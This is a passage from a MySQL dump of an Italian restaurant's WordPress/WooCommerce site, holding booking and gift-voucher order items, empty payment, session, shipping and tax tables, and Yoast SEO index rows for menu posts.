Tavolo per 2 Persone San Valentino','line_item',735),(251,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',736),(252,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',737),(253,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',738),(254,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',739),(255,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',740),(256,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',741),(257,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',743),(258,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',744),(259,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',745),(260,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',746),(261,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',758),(262,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',761),(263,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',763),(264,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',764),(265,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',765),(266,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',766),(267,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',767),(268,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',768),(269,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',769),(270,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',770),(271,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',771),(272,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',772),(273,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',773),(274,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',775),(275,'Buono Regalo (valore a scelta)','line_item',777),(276,'Buono Regalo (valore a scelta)','line_item',780),(277,'Buono Regalo (valore a scelta)','line_item',780),(278,'Buono Regalo (valore a scelta)','line_item',781),(279,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',790),(280,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',791),(281,'Prenotazione Tavolo per 8 Persone - Pasqua','line_item',792),(282,'Prenotazione Tavolo per 5 Persone - Pasquetta','line_item',793),(283,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',794),(285,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',795),(286,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',796),(288,'Prenotazione Tavolo per 8 Persone - Pasquetta','line_item',797),(289,'Buono Regalo (valore a scelta)','line_item',798),(290,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',802),(291,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',803),(292,'Prenotazione Tavolo per 5 Persone - Pasqua','line_item',804),(293,'Prenotazione Tavolo per 3 Persone - Pasquetta','line_item',805),(295,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',806),(296,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',807),(297,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',808),(298,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',809),(299,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',810),(300,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',811),(301,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',812),(302,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',814),(304,'Prenotazione Tavolo per 4 Persone - Pasquetta','line_item',815),(305,'Prenotazione Tavolo per 3 Persone - Pasqua','line_item',816),(308,'Prenotazione Tavolo per 4 Persone - Pasqua','line_item',817),(309,'Prenotazione Tavolo per 2 Persone - Pasqua','line_item',818),(310,'Prenotazione Tavolo per 2 Persone - Pasquetta','line_item',819),(311,'Buono Regalo (valore a scelta)','line_item',820),(312,'Buono Regalo (valore a scelta)','line_item',822),(313,'Buono Regalo (valore a scelta)','line_item',824),(314,'Buono Regalo (valore a scelta)','line_item',826),(315,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',828),(316,'Buono Regalo (valore a scelta)','line_item',830),(317,'Buono Regalo (valore a scelta)','line_item',832),(318,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',834),(320,'Buono Regalo (valore a scelta)','line_item',836),(321,'Regala cena: Menù Storico per 2 persone + Bevande','line_item',838),(322,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',857),(323,'Buono Regalo (valore a scelta)','line_item',859),(324,'Caparra - 8','line_item',886),(325,'Caparra - 8','line_item',887),(326,'Caparra - 8','line_item',888),(327,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',889),(328,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',890),(329,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',891),(330,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',893),(331,'Caparra - 8','line_item',895),(334,'Caparra - 8','line_item',896),(335,'Caparra - 6','line_item',896),(336,'Caparra - 8','line_item',897),(337,'Caparra - 5','line_item',897),(338,'Caparra - 4','line_item',897),(339,'Regala cena: Menù Storico per 2 persone','line_item',906),(340,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',912),(341,'Caparra - 8','line_item',914),(342,'Caparra - 2','line_item',915),(343,'Caparra - 3','line_item',916),(344,'Caparra - 2','line_item',917),(345,'Caparra - 4','line_item',918),(346,'Caparra - 2','line_item',919),(347,'Caparra - 2','line_item',920),(348,'Caparra - 8','line_item',921),(349,'Buono Regalo (valore a scelta)','line_item',922),(350,'Caparra - 2','line_item',924),(353,'Caparra - 2','line_item',926),(354,'Buono Regalo (valore a scelta)','line_item',927),(355,'Caparra - 2','line_item',929),(356,'Caparra - 2','line_item',930),(357,'Caparra - 2','line_item',931),(358,'Caparra - 2','line_item',932),(359,'Caparra - 3','line_item',933),(360,'Caparra - 2','line_item',934),(361,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',936),(362,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',949),(363,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',950),(364,'Buono Regalo (valore a scelta)','line_item',951),(365,'Caparra - 2','line_item',953),(366,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',954),(367,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',955),(368,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',956),(369,'Caparra - 8','line_item',957),(370,'Caparra - 2','line_item',958),(372,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',959),(373,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',960),(374,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',961),(375,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',962),(376,'Prenotazione Tavolo per 2 Persone San Valentino','line_item',963),(377,'Buono Regalo (valore a scelta)','line_item',967),(378,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',1051),(379,'Regala cena: Menù Creativo per 2 persone','line_item',1124),(380,'Regala cena: Menù Creativo per 2 persone + Bevande','line_item',1127),(381,'Buono Regalo (valore a scelta)','line_item',1141),(382,'Caparra - 2','line_item',1222),(383,'Buono Regalo (valore a scelta)','line_item',1257),(384,'Buono Regalo (valore a scelta)','line_item',3677),(385,'Buono Regalo (valore a scelta)','line_item',3678),(386,'Buono Regalo (valore a scelta)','line_item',3679),(387,'Buono Regalo (valore a scelta)','line_item',3679),(388,'Buono Regalo (valore a scelta)','line_item',3686),(389,'Buono Regalo (valore a scelta)','line_item',3686),(390,'Buono Regalo (valore a scelta)','line_item',3687);
/*!40000 ALTER TABLE `wp_woocommerce_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_payment_tokenmeta`
--

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokenmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_payment_tokenmeta`
--

LOCK TABLES `wp_woocommerce_payment_tokenmeta` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokenmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokenmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_payment_tokens`
--

DROP TABLE IF EXISTS `wp_woocommerce_payment_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_payment_tokens` (
  `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `token` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `type` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_payment_tokens`
--

LOCK TABLES `wp_woocommerce_payment_tokens` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_payment_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_sessions`
--

DROP TABLE IF EXISTS `wp_woocommerce_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `session_value` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_id`),
  UNIQUE KEY `session_key` (`session_key`)
) ENGINE=MyISAM AUTO_INCREMENT=11388 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_sessions`
--

LOCK TABLES `wp_woocommerce_sessions` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_sessions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) unsigned NOT NULL,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zone_locations`
--

LOCK TABLES `wp_woocommerce_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) unsigned NOT NULL,
  `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `method_order` bigint(20) unsigned NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`instance_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zone_methods`
--

LOCK TABLES `wp_woocommerce_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_methods` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_shipping_zones`
--

DROP TABLE IF EXISTS `wp_woocommerce_shipping_zones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_shipping_zones` (
  `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `zone_order` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_shipping_zones`
--

LOCK TABLES `wp_woocommerce_shipping_zones` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zones` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_shipping_zones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_tax_rate_locations`
--

DROP TABLE IF EXISTS `wp_woocommerce_tax_rate_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_code` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `location_type` varchar(40) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type` (`location_type`),
  KEY `location_type_code` (`location_type`,`location_code`(90))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_tax_rate_locations`
--

LOCK TABLES `wp_woocommerce_tax_rate_locations` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_woocommerce_tax_rates`
--

DROP TABLE IF EXISTS `wp_woocommerce_tax_rates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(2) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate` varchar(8) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) unsigned NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT '0',
  `tax_rate_shipping` int(1) NOT NULL DEFAULT '1',
  `tax_rate_order` bigint(20) unsigned NOT NULL,
  `tax_rate_class` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`),
  KEY `tax_rate_state` (`tax_rate_state`(191)),
  KEY `tax_rate_class` (`tax_rate_class`(191)),
  KEY `tax_rate_priority` (`tax_rate_priority`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_woocommerce_tax_rates`
--

LOCK TABLES `wp_woocommerce_tax_rates` WRITE;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rates` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_woocommerce_tax_rates` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_indexable`
--

DROP TABLE IF EXISTS `wp_yoast_indexable`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext COLLATE utf8mb4_unicode_520_ci,
  `permalink_hash` varchar(40) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `object_id` bigint(20) DEFAULT NULL,
  `object_type` varchar(32) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `object_sub_type` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `author_id` bigint(20) DEFAULT NULL,
  `post_parent` bigint(20) DEFAULT NULL,
  `title` text COLLATE utf8mb4_unicode_520_ci,
  `description` mediumtext COLLATE utf8mb4_unicode_520_ci,
  `breadcrumb_title` text COLLATE utf8mb4_unicode_520_ci,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT '0',
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext COLLATE utf8mb4_unicode_520_ci,
  `primary_focus_keyword` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT '0',
  `is_robots_noindex` tinyint(1) DEFAULT '0',
  `is_robots_nofollow` tinyint(1) DEFAULT '0',
  `is_robots_noarchive` tinyint(1) DEFAULT '0',
  `is_robots_noimageindex` tinyint(1) DEFAULT '0',
  `is_robots_nosnippet` tinyint(1) DEFAULT '0',
  `twitter_title` text COLLATE utf8mb4_unicode_520_ci,
  `twitter_image` longtext COLLATE utf8mb4_unicode_520_ci,
  `twitter_description` longtext COLLATE utf8mb4_unicode_520_ci,
  `twitter_image_id` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `twitter_image_source` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_title` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_description` longtext COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image` longtext COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image_id` varchar(191) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `open_graph_image_source` text COLLATE utf8mb4_unicode_520_ci,
  `open_graph_image_meta` mediumtext COLLATE utf8mb4_unicode_520_ci,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
  `blog_id` bigint(20) NOT NULL DEFAULT '1',
  `language` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `schema_page_type` varchar(64) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `schema_article_type` varchar(64) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT '0',
  `estimated_reading_time_minutes` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`)
) ENGINE=MyISAM AUTO_INCREMENT=2634 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_indexable`
--

LOCK TABLES `wp_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable` VALUES (1,'https://www.ristorantesolymar.it/vecchio/author/magnaromagna/','61:57ddb3e98baffdf52a6b791f8a533dac',1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,'https://secure.gravatar.com/avatar/2b9d47e8161b0281bcdf273591c757a0?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/2b9d47e8161b0281bcdf273591c757a0?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-05-13 09:48:09','2021-03-25 17:13:17',1,NULL,NULL,NULL,NULL,0,NULL),(1520,NULL,NULL,3698,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-06 00:23:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(1521,NULL,NULL,3699,'post','postman_sent_mail',0,0,NULL,NULL,'Private: [Sol Y Mar] Some plugins were automatically updated','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-06 00:23:01','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(3,NULL,NULL,NULL,'system-page','404',NULL,NULL,'Pagina non trovata %%sep%% %%sitename%%',NULL,'Errore 404: Pagina non trovata',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-13 10:03:07','2020-07-09 00:47:16',1,NULL,NULL,NULL,NULL,0,NULL),(4,'https://www.ristorantesolymar.it/vecchio/author/solymar/','56:f396596c55a3d0d4c16c05d83357b350',2,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,'https://secure.gravatar.com/avatar/560aab6e366360abe873d413288d9221?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/560aab6e366360abe873d413288d9221?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-05-13 10:03:31','2021-02-04 21:04:52',1,NULL,NULL,NULL,NULL,0,NULL),(5,'https://www.ristorantesolymar.it/vecchio/2020/01/31/menu-di-san-valentino-2020/','79:be61af338a3a2396b83fb43a450666fd',943,'post','post',2,0,NULL,NULL,'Menù di San Valentino 2020','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio.jpg',NULL,'944','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2020/01/solymar-14-febbraio.jpg','944','featured-image','{\"width\":1440,\"height\":1440,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/01\\/solymar-14-febbraio.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2020\\/01\\/solymar-14-febbraio.jpg\",\"size\":\"full\",\"id\":944,\"alt\":\"\",\"pixels\":2073600,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-05-13 10:03:54','2021-01-31 20:22:43',1,NULL,NULL,NULL,NULL,0,NULL),(6,'https://www.ristorantesolymar.it/vecchio/2019/12/11/menu-cenone-di-capodanno-31-dicembre-2019/','94:e2d993c89a403b440667fc1184959a27',909,'post','post',1,0,NULL,NULL,'Menù Cenone di Capodanno 31 dicembre 2019','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/12/capodanno2019.jpg',NULL,'910','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/12/capodanno2019.jpg','910','featured-image','{\"width\":710,\"height\":972,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/12\\/capodanno2019.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/12\\/capodanno2019.jpg\",\"size\":\"full\",\"id\":910,\"alt\":\"\",\"pixels\":690120,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-05-13 10:03:54','2021-01-31 20:22:43',1,NULL,NULL,NULL,NULL,0,NULL),(7,'https://www.ristorantesolymar.it/vecchio/2019/04/03/menu-di-pasqua-e-pasquetta-2019/','84:cd022c422e9eb815d9e639bcfdb94374',784,'post','post',1,0,NULL,NULL,'Menù di Pasqua e Pasquetta 2019','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter.jpg',NULL,'786','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/04/happy-easter.jpg','786','featured-image','{\"width\":800,\"height\":800,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/04\\/happy-easter.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/04\\/happy-easter.jpg\",\"size\":\"full\",\"id\":786,\"alt\":\"\",\"pixels\":640000,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-05-13 10:03:54','2021-01-31 20:22:43',1,NULL,NULL,NULL,NULL,0,NULL),(8,'https://www.ristorantesolymar.it/vecchio/2019/02/01/menu-di-san-valentino-2019/','79:adef0b630e529881840f433f348b135a',727,'post','post',2,0,NULL,NULL,'Menù di San Valentino 2019','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,0,0,0,0,0,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019.jpg',NULL,'728','featured-image',NULL,NULL,'https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019.jpg','728','featured-image','{\"width\":1600,\"height\":1600,\"url\":\"https:\\/\\/www.ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/02\\/san-valentino-2019.jpg\",\"path\":\"\\/home\\/baltazar\\/ristorantesolymar.it\\/wp-content\\/uploads\\/2019\\/02\\/san-valentino-2019.jpg\",\"size\":\"full\",\"id\":728,\"alt\":\"\",\"pixels\":2560000,\"type\":\"image\\/jpeg\"}',0,0,NULL,'2020-05-13 10:03:54','2021-01-31 20:22:43',1,NULL,NULL,NULL,NULL,0,NULL),(9,'https://www.ristorantesolymar.it/vecchio/2018/03/10/menu-di-pasqua-e-pasquetta-2018/','84:8dc7a593052c51a6d419ef2d65722c26',620,'post','post',2,0,NULL,NULL,'Menù di Pasqua e Pasquetta 2018','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-05-13 10:03:54','2021-02-04 02:14:57',1,NULL,NULL,NULL,NULL,0,NULL),(10,'https://www.ristorantesolymar.it/vecchio/2018/01/27/menu-san-valentino-2018/','76:5dea1ff539368cd4e28659052a21c4dc',590,'post','post',2,0,NULL,NULL,'Menù di San Valentino 